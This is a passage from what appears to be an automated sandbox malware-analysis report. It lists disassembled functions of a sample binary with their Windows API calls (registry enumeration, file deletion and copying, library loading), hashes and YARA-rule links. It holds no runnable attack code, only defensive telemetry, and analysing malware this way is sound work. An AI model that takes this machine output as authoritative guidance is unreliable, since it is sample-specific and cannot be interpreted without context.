                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F67C36
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                                        • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                                        • Opcode ID: 875b37ab8ee11193eaf6be2ef4dba62617f6d0e13a79fe237d4920c3a577f551
                                                                                                                                                                                                                                                                                        • Instruction ID: c867678ba8b6fc83291e2fceb64f05350df5ab02c5fdb890e816d5988d457758
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 875b37ab8ee11193eaf6be2ef4dba62617f6d0e13a79fe237d4920c3a577f551
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A341C3B1604304DFDB15EF24D984B9A7BB9EF44318F1080ADA805DF24AD7B1DD44EBA0
                                                                                                                                                                                                                                                                                        Function 00F94818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F948D1
                                                                                                                                                                                                                                                                                        • IsMenu.USER32(?), ref: 00F948E6
                                                                                                                                                                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F9492E
                                                                                                                                                                                                                                                                                        • DrawMenuBar.USER32 ref: 00F94941
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: 06c1f477eb3c4d2022f508cd9e98e0853bd59355772dbb6101c14193bab3bd47
                                                                                                                                                                                                                                                                                        • Instruction ID: b9b0fe2b17e3919fa1aa840e2e530620dd0abc8b7df4615e121e6f91270241b7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06c1f477eb3c4d2022f508cd9e98e0853bd59355772dbb6101c14193bab3bd47
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB415B75A01209EFEF10CF61D884EAABBB9FF56324F044129E95697250C730ED46EFA0
                                                                                                                                                                                                                                                                                        Function 00F6272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F64620
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F627B3
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F627C6
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F627F6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                        • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                                        • Opcode ID: 7309510d50a8bd699c362f70c1d1cb9b7d89d0275bc68d7db5977a6340ebb1e7
                                                                                                                                                                                                                                                                                        • Instruction ID: 46ac1bd722090f7cd2c35f29c84651da4d144e8d4df3d05d2dac10e6ad3d619a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7309510d50a8bd699c362f70c1d1cb9b7d89d0275bc68d7db5977a6340ebb1e7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8221D372900104BEDB15ABB4DC46DFEB778DF853A0B14412AF422A71E1CB384D0AFA60
                                                                                                                                                                                                                                                                                        Function 00F939B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F93A29
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00F93A30
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F93A45
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00F93A4D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                        • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                        • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                        • Opcode ID: 716097573b25f1f2d99a5a6866482c728f9e96a2126f7a388536ce8787d79f40
                                                                                                                                                                                                                                                                                        • Instruction ID: a134f1cb6713d8d31c9d3e21b324eda08faf99b2f9944e054c6b09051130b72d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 716097573b25f1f2d99a5a6866482c728f9e96a2126f7a388536ce8787d79f40
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88219D75A00209ABFF109F64DC80FAB77AAEB46364F105219FA9196190C776DD41B760
                                                                                                                                                                                                                                                                                        Function 00F250DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F2508E,?,?,00F2502E,?,00FC98D8,0000000C,00F25185,?,00000002), ref: 00F250FD
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F25110
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00F2508E,?,?,00F2502E,?,00FC98D8,0000000C,00F25185,?,00000002,00000000), ref: 00F25133
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                        • Opcode ID: 073db7e9d5a0d4b62d8a82dd18eceae5289feead76bd4f26a84b5b8d536da440
                                                                                                                                                                                                                                                                                        • Instruction ID: af0d0ec8f7907d088a4e432b17f0ad4c17518b42d0d084f4f204ab8e49cda59d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 073db7e9d5a0d4b62d8a82dd18eceae5289feead76bd4f26a84b5b8d536da440
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5F0683594022CBBDB115F94EC49BADBFB4EF04B56F100165F905A2160DB749D90EA91
                                                                                                                                                                                                                                                                                        Function 00F06607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F45657,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F06610
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F06622
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00F45657,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F06635
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                        • Opcode ID: ad5f96bb1b6739cd94a395f11201fca13417a18ce4675de000eaed95c0e31557
                                                                                                                                                                                                                                                                                        • Instruction ID: 133075c5c0aa104a99dd2720b6777e375fdcde0077e77d48a6bf91ae0d3af564
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad5f96bb1b6739cd94a395f11201fca13417a18ce4675de000eaed95c0e31557
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6D0C232A0253257A22227207E18A8E3A149F91B253150016B900E6154CF22CC51B198
                                                                                                                                                                                                                                                                                        Function 00F73306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F735C4
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00F73646
                                                                                                                                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F7365C
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F7366D
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F7367F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5f84a53087e72a9ee4243cd114427e96cd2c8b86d886ad704c52a90b55109bcd
                                                                                                                                                                                                                                                                                        • Instruction ID: 336aa345505adfdefdd7c9ca0c3c24a6c12e2447b70fa3e0ec0a6e269b08c2f0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f84a53087e72a9ee4243cd114427e96cd2c8b86d886ad704c52a90b55109bcd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8B15F72D00129BBDF15DBA4CC85EDEBBBDEF48314F1080A6F509E7151EA349B44AB61
                                                                                                                                                                                                                                                                                        Function 00F8ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00F8AE87
                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F8AE95
                                                                                                                                                                                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F8AEC8
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F8B09D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 586535478974c54b1dfee9432a39653d198da8fcef0c0d5a256f5fd1e3fadd1c
                                                                                                                                                                                                                                                                                        • Instruction ID: 8ca8a48b0603aabc520318757f735c032905db69c4f4050807166e207772fadf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 586535478974c54b1dfee9432a39653d198da8fcef0c0d5a256f5fd1e3fadd1c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FAA1CF71A00301AFE720EF24D886F6AB7E5AF44720F14885DF5999B2D2DB75EC41AB81
                                                                                                                                                                                                                                                                                        Function 00F8C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8C10E,?,?), ref: 00F8D415
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D451
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D4C8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D4FE
                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8C505
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F8C560
                                                                                                                                                                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F8C5C3
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00F8C606
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F8C613
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 826366716-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 129e0e68e124a40759d6c413e6e6f0033f81b3ad95ca29cce02b1040d9aa2ecb
                                                                                                                                                                                                                                                                                        • Instruction ID: 1da2c50efc2e878e6849e0d677e0e9a4f2c8db05559ecb6fab9275f33ab8ba33
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 129e0e68e124a40759d6c413e6e6f0033f81b3ad95ca29cce02b1040d9aa2ecb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D61C331608241AFD714EF14C890E6ABBE5FF84318F54855CF4998B2A2DB31ED46EBA1
                                                                                                                                                                                                                                                                                        Function 00F6ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F6D7CD,?), ref: 00F6E714
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F6D7CD,?), ref: 00F6E72D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6EAB0: GetFileAttributesW.KERNEL32(?,00F6D840), ref: 00F6EAB1
                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00F6ED8A
                                                                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00F6EDC3
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6EF02
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6EF1A
                                                                                                                                                                                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00F6EF67
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8965bc1ff464e786db385bc4fa7b3662b377c95baf6b8011b2dc8e78f79b8750
                                                                                                                                                                                                                                                                                        • Instruction ID: 6249824565ed97af7af8eba70ba9f345cbb834cdfecabe5b5579c24964ce4605
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8965bc1ff464e786db385bc4fa7b3662b377c95baf6b8011b2dc8e78f79b8750
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED5193B64083859BC724EB94DC819DBB3ECEF95310F00092EF689C3191EF75A68CA756
                                                                                                                                                                                                                                                                                        Function 00F69517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F69534
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32 ref: 00F695A5
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32 ref: 00F69604
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F69677
                                                                                                                                                                                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F696A2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5cb9d52b0d5c4f913bf7d96493971e2f203dfdfd506fbfe9159de80c34043b5f
